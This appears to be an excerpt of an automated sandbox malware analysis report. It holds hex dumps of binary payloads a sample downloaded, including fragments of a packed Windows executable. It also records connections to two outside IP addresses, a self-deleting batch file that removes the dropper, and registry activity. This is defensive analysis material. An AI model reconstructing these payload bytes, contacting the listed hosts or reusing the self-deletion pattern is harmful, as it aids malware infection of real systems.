bc01 56f2 0574 64df b38c 8984 3d4b 98e1    ..V..td.....=K..
23b2 5f01 8265 2f7b 0480 023e 599c 7dc1    #._..e/{...>Y.}.
e005 509c 55c0 eb68 bf90 25c2 6ae1 41c7    ..P.U..h..%.j.A.
f291 0df7 f17d eb0b 3577 348c 097b 18ac    .....}..5w4..{..
d6c8 da42 8412 0f9c 7ab1 c72b 796b 0050    ...B....z..+yk.P
c001 8664 8102 8bb8 0733 c63e 5179 ca12    ...d.....3.>Qy..
680c 3218 1e08 64e9 6760 8067 082b 845f    h.2...d.g`.g.+._
0836 1e06 3b53 1c9d 9866 ff2e b4f1 9d25    .6..;S...f.....%
6b8a 011b 9e8a c300 df13 2784 7ac3 181c    k.........'.z...
8a40 d3ec 3607 1eb0 b94c c324 1686 50bb    .@..6....L.$..P.
a1b8 b299 fbd0 2068 2b0c 602b 3303 a961    ...... h+.`+3..a
df17 9c0c cd76 0c64 13df 1018 08f4 4173    .....v.d......As
7cdb 425d 98ea e735 70b3 ff1c a65c 3412    |.B]...5p....\4.
00bf 2053 40f0 0b9e 8b05 88e9 178d d819    .. S@...........
4f7a d98b fa6e cb4f eccb 1b36 9b1d 23f3    Oz...n.O...6..#.
bf10 3735 2ea9 07b1 0427 592e 6677 8ca5    ..75.....'Y.fw..
042d ee04 5304 f052 b3d9 619e e4e0 9d48    .-..S..R..a....H
14c4 5231 ac2e c4d5 b5b9 f97e cf75 b328    ..R1.......~.u.(
ef52 4630 7e0e a27d f5c5 aa51 5e52 1f38    .RF0~..}...Q^R.8
5847 9ecd cd45 d84b c08c 8b1d ee18 21ba    XG...E.K......!.
906c 51f6 d39c 40be bc40 c6e0 cd69 41b4    .lQ...@..@...iA.
160e 2919 e456 c6a0 7cdf b319 71ae b4ac    ..)..V..|...q...
04a0 bd94 6593 e680 6410 80ba 19ac 11e5    ....e...d.......
9c04 a6bd 24bf ae0c b280 0420 a85c 367c    ....$...... .\6|
52de 40ba 61a7 cf34 b72c c2ab 05ad bf70    R.@.a..4.,.....p
9f40 0e47 1811 2f8c 9c6a 4267 3ec9 8cb9    .@.G../..jBg>...
32ae 6912 4cce 6852 d967 4082 ed70 5668    2.i.L.hR.g@..pVh
0f14 106b 4b17 0c63 0c3a befc 841c 2281    ...kK..c.:....".
8b6a 4e59 ee9d 35c9 0228 70d5 4668 22f5    .jNY..5..(p.Fh".
35c2 1174 3a58 307b c86c 078c 0b34 1d10    5..t:X0{.l...4..
4147 cff6 a03d 9d4c 05dc 6ad6 0547 e9eb    AG...=.L..j..G..
eb2c 9649 bb0d b5b0 c261 0fbf 6852 e654    .,.I.....a..hR.T
06e3 bedd 7c84 4c14 166c 8a08 1333 db88    ....|.L..l...3..
fd26 d0dd 0534 5313 38aa 0a48 8a66 be6c    .&...4S.8..H.f.l
bb3e 1788 0348 1258 8a44 03c9 6ced d958    .>...H.X.D..l..X
12b8 5886 6e54 c20d 2ca1 ae68 036c e0f6    ..X.nT..,..h.l..
e998 11e8 7e31 55c7 160a 52b0 2d70 074d    ....~1U...R.-p.M
2e24 7d58 8bcd f7be 0b5c 42e0 39fc 590f    .$}X.....\B.9.Y.
069a 6875 5c88 4f9b 20a1 54ca f0ce 8004    ..hu\.O. .T.....
d0ea 306e 5d67 f8d1 097c 2c46 638b 1807    ..0n]g...|,Fc...
7542 2d77 f503 7d35 ac9c 3bcb 75ce 57e2    uB-w..}5..;.u.W.
cbdd 3a58 3bd3 0950 385c 099a 7530 76c6    ..:X;..P8\..u0v.
8db4 4a56 5470 0440 f734 9825 022c ac27    ..JVTp.@.4.%.,.'
648d 974b                                  d..K

Data received:

    
c06a 670c e105 51b9 b717 844b 0727 0955    .jg...Q....K.'.U
9b4b 741d 44f3 c485 8d0e 8a40 f50a 0609    .Kt.D......@....
0e0b def1 01eb 0951 f544 5b51 d675 6f5c    .......Q.D[Q.uo\
2805 5c03 6030 bbae 7586 7126 48b9 054c    (.\.`0..u.q&H..L
0350 74c7 a239 8b1c 540b 0750 eb0a 6d37    .Pt..9..T..P..m7
72b2 492f 895c 3c03 40e9 13cc 0b1c d614    r.I/.\<.@.......
4e13 ac24 5d33 c048 1694 bebf c20d 7523    N..$]3.H......u#
9ef4 f454 ee08 fd52 aac4 07b2 81dd 0403    ...T...R........
5c29 6c08 0cb5 2152 0219 ef04 4279 08b1    \)l...!R....By..
d0e3 403e c3ef 169c 070e 640a 0451 463e    ..@>......d..QF>
81a5 42f7 ed11 5642 33d2 dee8 28ec 2d3b    ..B...VB3...(.-;
c282 772c e188 8898 7046 c6ee 1989 909c    ..w,....pF......
05a0 a461 d8d0 5bfd eb06 89a1 8bf2 55d9    ...a..[.......U.
dcbd a90f f689 8690 0125 8e94 01be a8f4    .........%......
5e46 8749 2c72 8dae 4bb4 dc26 27b0 086d    ^F.I,r..K..&'..m
8b4d ca93 e739 6162 3bda 52cd 34c9 4817    .M...9ab;.R.4.H.
c0da cd45 5968 d924 9a13 1793 cd90 2c77    ...EYh.$......,w
345e 2c8b 7dcb 1314 cccf 4510 895d 8601    4^,.}.....E..]..
d057 640b 9804 4d56 bf63 8528 9073 0c8d    .Wd...MV.c.(.s..
8612 5250 e28e 6832 7868 7d8d 9698 f212    ..RP..h2xh}.....
74f1 45b3 5636 0028 40b8 0b62 c50c 029f    t.E.V6.(@..b....
59c2 18b6 444b 7490 ff6a a83f 1717 7fff    Y...DKt..j.?....
e064 a173 5064 8925 0781 ec58 9eb7 6e54    .d.sPd.%...X..nT
20aa 9b89 6537 7dfc 862f 760f e5bc f209     ...e7}../v.....
576e 3c74 ef06 b4fa 8a45 0b57 8d68 e988    Wn<t.....E.W.h..
8505 ac5b 6d67 d38b ac57 08fc 01ad 1baf    ...[mg...W......
a7fb 68b8 5304 a49c a521 fee0 5cb7 44d9    ..h.S....!..\.D.
7c0a 5120 2e9e 78bb 1dbf 9558 3c8d 851a    |.Q ..x....X<...
c5f0 fa3c db66 70d4 40bc 685c 5366 1f18    ...<.fp.@.h\Sf..
f1bd 4b8d 4dd4 38f1 d605 97ce 1842 9757    ..K.M.8......B.W
e9d0 3bf7 6afb 2cb0 e356 4eb0 45d4 44ec    ..;.j.,..VN.E.D.
f11d b055 d2db c43f 088d 55ec 5246 c6da    ...U...?..U.RF..
b7b3 423f 111b 18ab 57dc 7dcc dd10 91a4    ..B?....W.}.....
f114 7476 8b10 1092 1001 c924 6787 6521    ..tv.......$g.e!
e854 2639 39e4 c400 43ac 32da e349 4ebc    .T&99...C.2..IN.
218b 9369 274d b29c edde 5170 130d 9468    !..i'M....Qp...h
40af 300d 0841 adef e8ef b6bb d6ec 8b83    @.0..A..........
1e99 2bc2 d1c7 99d1 f964 6b76 6f08 894d    ..+......dkvo..M
d80b 45d8 c81d 90f8 dd57 1af8 2906 f055    ..E......W..)..U
d1ff d1fe 2bf7 3a77 d93a 9927 8051 5258    ....+.:w.:.'.QRX
130d 196b edac d963 5660 0d0b 1b66 9d06    ...k...cV`...f..
df1a a218 2ddb 6d66 c745 acd1 02db ac8d    ....-.mf.E......
62b4 9608 e485 5407 0d86 6dc2 02a8 0a77    b.....T...m....w
b650 ce09 1554 2e09 681c 25d4 d68e 65f0    .P...T..h.%...e.
46d7 3654 bb4f b1c6 c42a 1af9 20dc 8e1d    F.6T.O...*.. ...
80de 2dfc 05f6 d350 56a9 e414 211c b954    ..-....PV...!..T
b0c6 43ed 1f85 c9a2 2972 4716 90ad 859c    ..C.....)rG.....
4854 4292 419e 13ba 4cd2 4ca8 3042 064c    HTB.A...L.L.0B.L
05d8 bb4f 170d 8d98 1b3b de48 dbeb 2353    ...O.....;.H..#S
4451 db60 4353 40d8 3053 864c 66ea 4bf6    DQ.`CS@.0S.Lf.K.
cc48 9281 ec05 4f2b 6848 8948 6a72 90ed    .H....O+hH.Hjr..
f848 5757 8df4 fdd3 3f1e 4d9c 81c2 bf66    .HWW....?.M....f
8975 9c52 15cc e18c 1ab5 0d9c 3114 568b    .u.R........1.V.
62c4 cbad 0336 9c41 3975 ecf1 bba2 dbb6    b....6.A9u......
2ce4 35bc 2fbc ef5c 57b3 5581 0cc5 27d4    ,.5./..\W.U...'.
7c89 d7b8 7c3b c689 45c4 3bfe 6316 2beb    |...|;..E.;.c.+.
3efd 5b04 c40e 0007 8068 4081 4d8c 4e04    >.[......h@.M.N.
39a1 d6f1 ac8c 6855 bc17 5206 3e34 f7be    9.....hU..R.>4..
5323 1c05 0d03 8a5c 9ffa 74d5 d03d 7880    S#.....\..t..=x.
458c 5ed3 d6dc e775 8e51 edb8 58d0 f781    E.^....u.Q..X...
03df 8502 bb03 2682 42d8 6733 fea3 01e1    ......&.B.g3....
c674 4d6a 6453 0e21 f79c 7d7c 5fd0 ed7c    .tMjdS.!..}|_..|
1010 d864 661b 7ed2 e029 4781 fff4 967e    ...df.~..)G....~
0f1c 72bf 84e9 2938 3539 5dd8 7caf d51d    ..r...)859].|...
db02 b56c 8510 81dc dc92 741f b357 0c47    ...l......t..W.G
d1ff 11a4 b69c 6b8c dc88 0010 06ac b61e    ......k.........
2c77 2d10 55dc 521a a8bb 1be9 46dc 1da4    ,w-.U.R.....F...
ecc6 518b 8ab9 b96d 7bc3 0f1f 4cb3 0166    ..Q....m{...L..f
e002 e85a dbd6 b5b2 9ce0 86ee 0789 7876    ...Z..........xv
cc75 6e2b 522b c268 f214 089b 5d68 0f89    .un+R+.h....]h..
3cfb 677e 2114 1037 976d e0ec 2212 570f    <.g~!..7.m..".W.
6c02 32db 9270 1662 a9ba be06 595b f8ea    l.2..p.b....Y[..
1185 3566 d6d0 09be 6c9f 9087 180d 837d    ..5f....l......}
d804 1d86 77c0 2c8c e88a 74e6 9fee d219    ....w.,...t.....
dce8 a8b6 4b78 7564 1f6e 63d4 753d 5ddb    ....Kxud.nc.u=].
7066 761b 45e0 e9c9 aed8 e2e8 aff8 4074    pfv.E.........@t
3f01 7e96 e49b f4ec 528b 8826 3bc1 7423    ?.~.....R..&;.t#
451a daeb 3f03 5d0d 3570 bbed 2cb0 3e52    E...?.].5p..,.>R
936c 25eb ca6a 329e 81ed 09d5 84db 95fe    .l%..j2.........
b24e 0de5 84c7 4a88 5904 9016 8e80 3bdb    .N....J.Y.....;.
d864 cf06 a208 0cd4 1c8b c5a1 e352 f3cc    .d...........R..
586a d7d1 8aed e435 d679 e0d5 066f 64e1    Xj.....5.y...od.
7cab 78e4 1554 5bfc 5b88 238b 653b dfc6    |.x..T[.[.#.e;..
4118 7428 a1ef 42a5 839c 0dc7 109c 91b1    A.t(..B.........
7853 89bb 0abb bba1 8538 5962 4d80 7310    xS.......8YbM.s.
1ee9 5ba4 3920 1c16 f48d a590 7dd0 aab3    ..[.9 ......}...
8409 0d58 0b2f 2103 7433 ebdd de4c 2c7e    ...X./!.t3...L,~
3406 effc b312 2f9f b789 490c 4552 883f    4...../...I.ER.?
cfea 20e1 00d5 5083 ec6c 6cb1 55a6 6c56    .. ...P..ll.U.lV
0057 063a                                  .W.:

Data received:

    
6a56 70c5 bf5f 0e53 afe0 a3a8 1113 2351    jVp.._.S......#Q
be82 4b85 7409 e36c 7d59 c1a1 0b3f 9fff

Data received:

    
253c d09e 91cd 1605 9c4c 74ca ab03 ddfe    %<.......Lt.....
603c 59c3 cc00 513d 3b31 71ec f7bd 7214    `<Y...Q=;1q...r.
81e9 0b2d 0485 0117 73ec 3501 6f4b 7ac4    ...-....s.5.oKz.
0c8b e18b 2250 99cd 55ad 3143 b205 001a    ...."P..U.1C....
1939 06cb 2eca 0759 40cd 740f c96b f05f    .9.....Y@.t..k._
24d0 66e9 6fe1 42f6 3e74 a56e 6a23 7c68    $.f.o.B.>t.nj#|h
0089 65e8 9e2f 4dc4 52ef fc0d d859 830d    ..e../M.R....Y..
67e1 6c87 d091 06d4 d058 91e7 f6c5 0dcc    g.l......X......
c508 0dd4 40c8 707f c2df a1d0 0c00 a3d8    ....@.p.........
402e f139 1db0 0a7f 6773 b77e 68f2 6c4e    @..9....gs.~h.lN
cc18 dc68 0cfb fbec 4309 0850 27d6 a1c4    ...h....C..P'...
3f45 948d 0266 fbe1 4239 35c0 cf45 9c50    ?E...f..B95..E.P
0390 90ef d086 a04b c440 3732 006f c4f7    .......K.@72.o..
c29b 24a1 e06e 304b 803e 22e4 dbfe ee75    ..$..n0K.>"....u
3a46 088a 063a c374 043c 0df2 1204 a6d9    :F...:.t.<......
b607 2076 f2d4 d04e a488 9fb7 7fe1 f645    .. v...N.......E
d024 110f b745 d4eb 0e2b 2076 d8eb f5bb    .$...E...+ v....
b375 e36a 0a58 1453 53fa 8c69 115c f088    .u.j.X.SS..i.\..
536d 9798 e949 5878 8cde 7809 894d 883f    Sm...IXx..x..M.?
2ed0 59b4 8b46 702d 542e 1988 28d1 ecb7    ..Y..Fp-T...(...
f046 c605 e4c8 b455 0304 db0d f3b5 2c2f    .F.....U......,/
f88b c3c3 21dc a084 7523 4853 cc00 590a    ....!...u#HS..Y.
b3c5 d01f b4a2 e906 599e 6d0c 079c bcbc    ........Y.m.....
8c1c 6cb0 41e0 1fe8 07cc e93b 4323 17cf    ..l.A......;C#..
c3de 092d 64be c966 6b4f 2304 20cc 07e4    ...-d..fkO#. ...
7b6c b041 ec33 f007 b820 4333 27a2 c006    {l.A.3... C3'...
0000 9014 fcff b71b 7680 2603 6116 0cd3    ........v.&.a...
afcd d011 8a3e 00c0 4fc9 e26e b5e3 c961    .....>..O..n...a
84c0 4670 d24c 3df5 b9ae ed7e 00ae 4bc2    ..Fp.L=....~..K.
0300 90f6 b037 cc2a 001b 0b40 4217 1792    .....7.*...@B...
e65b 1301 583b b9a7 3ed8 6013 2005 9319    .[..X;..>.`. ...
88a8 0fd9 096c f22b f85b 103f 234d d374    .....l.+.[.?#M.t
dd1c 0702 0f24 032c 04d3 7483 3434 3c07    .....$.,..t.44<.
0644 ba03 334d 074c 4708 9b09 9d7b c941    .D..3M.LG....{.A
1043 2853 eb27 3596 bdaf 14d9 9705 cf1f    .C(S.'5.........
837c 6eca 9760 5797 6870 a432 d820 7887    .|n..`W.hp.2. x.
80d3 4058 220a 04ff ff1f 5473 686c 7761    ..@X".....Tshlwa
7069 2e64 6c6c 0053 4853 6574 5661 cbcb    pi.dll.SHSetVa..
cbff 6c75 6541 0025 7370 4576 6865 6d73    ..lueA.%spEvhems
5c45 61dd 5e6e f474 696e 6769 4170 656e    \Ea.^n.tingiApen
7412 5363 fdbf 6bad 0705 0e0f 7870 6c6f    t.Sc..k.....xplo
7265 725c 4e61 7669 e5df 6ecd 2247 2d57    rer\Navi..n."G-W
4103 726f 7325 736f 77f5 ffae 752f 561e    A.ros%sow...u/V.
0c75 6e00 4f46 5400 5245 5c4d 691d a2fd    .un.OFT.RE\Mi...
4636 6f66 745c 5755 01f7 bbdf be4a 4375    F6oft\WU.....JCu
7272 0769 6f6e 5c52 0f63 3a5c 3334 3502    rr.ion\R.c:\345.
7bd9 fe7d 6466 6477 720a 3500 7262 1743    {..}dfdwr.5.rb.C
0077 621f bedb 9a1b 773a 5e38 2559 2e65    .wb.....w:^8%Y.e
7865 00db b6b6 fd8b 3033 0349 6f6e 6eca    xe......03.Ionn.
51c8 73dd eb7e 7279 4f70 7453 4163 6b69    Q.s..~ryOptSAcki
16eb b55f bb1d 4d5a 0f0d 0a01 1747 4593    ..._..MZ.....GE.
ff64 93ef 4423 7743 4372 6163 6b55 722b    .d..D#wCCrackUr+
dc7e d86c 4193 3235 3534 052e 620f e72d    .~.lA.2554..b..-
f6ed 7f65 4465 6275 6750 7269 f76c 6567    ...eDebugPri.leg
654b 32d8 17dc f64d 6f64 750e 4612 106d    eK2....Modu.F..m
6545 787b fc06 04e1 7073 65a7 4b49 4c4c    eEx{....pse.KILL
00bf d9d8 df49 4500 4558 4954 9b41 07d7    .....IE.EXIT.A..
3232 7bbf 1b73 6602 0097 5c74 745f 2564    22{..sf...\tt_%d
e01f d991 bfed 5510 452f 5044 4149 4641    ......U.E/PDAIFA
586b 07c3 52a2 370e 0927 56f8 6ddb 5262    Xk..R.7..'V.m.Rb
5418 4c0c 6764 449d e7b6 b785 4279 0566    T.L.gdD.....By.f
5959 0f7c 13f8 adbd bbfd 424c 4143 4b03    YY.|......BLACK.
4245 8d31 3266 7325 7039 f6db bf73 0566    BE.12fs%p9...s.f
6600 2f30 6e2e 7068 706b 2573 6d97 bf1d    f./0n.phpk%sm...
4f53 0461 3d25 6426 7673 26ce 640a bf9d    OS.a=%d&vs&.d...
c006 07a1 703a 2f2f 6629 c242 fb17 0e6f    ....p://f).B...o
6f6b 2e63 6f6d c773 2dfc edbd c285 0230    ok.com.s-......0
3691 1027 25bd 72bb 7dcf 6602 6372 036e    6..'%.r.}.f.cr.n
6506 788e 46e3 1781 3e12 23e3 16e1 d133    e.x.F...>.#....3
157d 1720 455a 4576 dde6 004d 611d 3143    .}. EZEv...Ma.1C
6176 b831 9aa3 325a 0257 6908 66db e768    av.1..2Z.Wi.f..h
a664 3f53 2e00 4df1 0886 db64 6f9d 6227    .d?S..M....do.b'
8ddb c7f7 6065 6f6e b620 526e 61ad dd36    ....`eon. Rna..6
38c3 3967 66f3 216a 660a 005c b64f b6e0    8.9gf.!jf..\.O..
448f 2c2e 3f41 6378 b7ad 88d1 d845 235f    D.,.?Acx.....E#_
6a6c 66ba eff6 7017 397b 3a20 2366 ab52    jlf...p.9{: #f.R
ed41 d819 9dee 3332 e343 6f43 6c5f 6bad    .A....32.CoCl_k.
b561 c5c9 a468 3f27 256d 2dd6 0a5d d305    .a...h?'%m-..]..
a431 65c5 3ed7 8d09 6111 690f 9749 0563    .1e.>...a.i..I.c
c16d ce57 1d09 6519 bd78 399e 2b6d 6f00    .m.W..e..x9.+mo.
4f11 2e7b 0b0d 1bac 1bdb 2f63 2762 2366    O..{....../c'b#f
4b45 31be dbdc 9348 2607 1773 293b 003c    KE1....H&..s);.<
0073 d76d ae6b 722f 704b aa44 2546 0375    .s.m.kr/pK.D%F.u
9bdb 5c52 0b45 6129 ff75 0767 3b30 d7dd    ..\R.Ea).u.g;0..
3f3d 006a 0976 0333 3e5f 775b b2ae 7527    ?=.j.v.3>_w[..u'
63a5 396d 1328 0029 c6ba cf75 097b 037b    c.9m.(.)...u.{.{
7423 721b 6673 6ca6 eb3f 6c7d 650d 7d65    t#r.fsl..?l}e.}e
05ae ebba 6e64 3763 216d 156e 2b2e 9fe9    ....nd7c!m.n+...
dee7 ba6f 1579 0951 6305 eb65 ac7b ddac    ...o.y.Qc..e.{..
7425 2d3d                                  t%-=

Data received:

    
7565 4100 0000 5365 7446 6f63 7573 0000    ueA...SetFocus..
496e 7465 726e 6574 5365 744f 7074 696f    InternetSetOptio
6e41 0000 0000 0000 0000 0000 0000 0000    nA..............
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000              ............

	- TCP Connection Attempts:

from ANUBIS:1037 to 212.58.23.82:80

from ANUBIS:1034 to 58.241.255.37:80

4. cmd.exe

	- General information about this executable

Analysis Reason:	Started by sample.exe
Filename:	cmd.exe
MD5:	6d778e0f95447e6546553eeea709d03c
SHA-1:	811a005cf787c6ccbe0d9f1c36c1d49a9cb71fd1
File Size:	389120 Bytes
Command Line:	cmd /c c:\353454543.bat
Process-status at analysis end:	dead
Exit Code:	1

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\msvcrt.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000

4.a) cmd.exe - Registry Activities

	- Registry Values Read:

Key	Name	Value	Times
HKLM\Software\Microsoft\Command Processor	AutoRun		1
HKLM\Software\Microsoft\Command Processor	CompletionChar	64	1
HKLM\Software\Microsoft\Command Processor	DefaultColor	0	1
HKLM\Software\Microsoft\Command Processor	EnableExtensions	1	1
HKLM\Software\Microsoft\Command Processor	PathCompletionChar	64	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	DefaultLevel	262144	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	PolicyScope	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemData	0x5eab304f957a49896a006c1c31154015	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemSize	779	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemData	0x67b0d48b343a3fd3bce9dc646704f394	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemSize	517	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemData	0x327802dcfef8c893dc8ab006dd847d1d	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemSize	918	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemData	0xbd9a2adb42ebd8560e250e4df8162f67	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemSize	229	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemData	0x386b085f84ecf669d36b956a22c01e80	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemSize	370	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	ItemData	%HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache%OLK*	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	SaferFlags	0	1
HKLM\System\CurrentControlSet\Control\Nls\Language Groups	1	1	1
HKLM\System\CurrentControlSet\Control\Nls\Locale	00000409	1	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Command Processor	CompletionChar	9	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Command Processor	DefaultColor	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Command Processor	EnableExtensions	1	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cache	C:\Documents and Settings\user\Local Settings\Temporary Internet Files	1

4.b) cmd.exe - File Activities

	- Files Deleted:

C:\sample.exe

c:\353454543.bat

	- Files Read:

c:\353454543.bat

	- Memory Mapped Files:

File Name

c:\353454543.bat

5. services.exe

	- General information about this executable

Analysis Reason:	NtConnectPort(\RPC Control\ntsvcs was called.
Filename:	services.exe
MD5:	0e776ed5f7cc9f94299e70461b7b8185
SHA-1:	cb5a33cec4c7b8ef4bd5dc8c241005b66b26cbbf
File Size:	108544 Bytes
Command Line:	C:\WINDOWS\system32\services.exe
Process-status at analysis end:	alive
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000
C:\WINDOWS\system32\msvcrt.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\NCObjAPI.DLL	0x5F770000	0x0000C000
C:\WINDOWS\system32\MSVCP60.dll	0x76080000	0x00065000
C:\WINDOWS\system32\SCESRV.dll	0x7DBD0000	0x00051000
C:\WINDOWS\system32\AUTHZ.dll	0x776C0000	0x00012000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\USERENV.dll	0x769C0000	0x000B4000
C:\WINDOWS\system32\umpnpmgr.dll	0x7DBA0000	0x00021000
C:\WINDOWS\system32\WINSTA.dll	0x76360000	0x00010000
C:\WINDOWS\system32\NETAPI32.dll	0x5B860000	0x00055000
C:\WINDOWS\system32\ShimEng.dll	0x5CB70000	0x00026000
C:\WINDOWS\AppPatch\AcAdProc.dll	0x47260000	0x0000F000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\system32\Apphelp.dll	0x77B40000	0x00022000
C:\WINDOWS\system32\VERSION.dll	0x77C00000	0x00008000
C:\WINDOWS\system32\eventlog.dll	0x77B70000	0x00011000
C:\WINDOWS\system32\PSAPI.DLL	0x76BF0000	0x0000B000
C:\WINDOWS\system32\WS2_32.dll	0x71AB0000	0x00017000
C:\WINDOWS\system32\WS2HELP.dll	0x71AA0000	0x00008000
C:\WINDOWS\system32\wtsapi32.dll	0x76F50000	0x00008000

5.a) services.exe - Registry Activities

	- Registry Keys Created:

HKLM\System\CurrentControlSet\Enum\Root\LEGACY_TAPISRV\0000\Control

HKLM\System\CurrentControlSet\Enum\Root\LEGACY_RASMAN\0000\Control

	- Registry Values Modified:

Key	Name	New Value
HKLM\System\CurrentControlSet\Enum\Root\LEGACY_RASMAN\0000\Control	ActiveService	RasMan
HKLM\System\CurrentControlSet\Enum\Root\LEGACY_TAPISRV\0000\Control	ActiveService	TapiSrv

	- Registry Values Read:

Key	Name	Value	Times
HKLM\SYSTEM\CONTROLSET001\ENUM\ACPI\PNP0303\4&2C5A7332&0	ClassGUID	{4D36E96B-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ACPI\PNP0400\4&2C5A7332&0	ClassGUID	{4D36E978-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ACPI\PNP0501\1	ClassGUID	{4D36E978-E325-11CE-BFC1-08002BE10318}	1
